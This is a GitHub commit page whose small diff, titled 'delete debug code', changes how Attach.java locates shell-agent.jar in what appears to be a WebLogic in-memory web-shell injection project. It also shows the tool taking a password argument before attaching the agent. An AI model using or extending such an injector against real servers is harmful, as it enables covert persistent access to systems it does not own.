Skip to content

Commit e598899

Browse files
committed
delete debug code
1 parent cb93d9e commit e598899

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

inject/src/main/java/Attach.java

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -19,8 +19,7 @@ public static void main(String[] args) throws Exception {
1919
String password = args[0];
2020
String currentPath = Attach.class.getProtectionDomain().getCodeSource().getLocation().getPath();
2121
currentPath = currentPath.substring(0, currentPath.lastIndexOf("/") + 1);
22-
// String agentFile = currentPath + "shell-agent.jar";
23-
String agentFile ="D:\\IntelliJ IDEA 2021.1.2\\project\\weblogic_memshell\\memshell_asm\\target\\shell-agent.jar";
22+
String agentFile = currentPath + "shell-agent.jar";
2423

2524
agentFile = new File(agentFile).getCanonicalPath();
2625
String agentArgs = currentPath;

0 commit comments

Comments
 (0)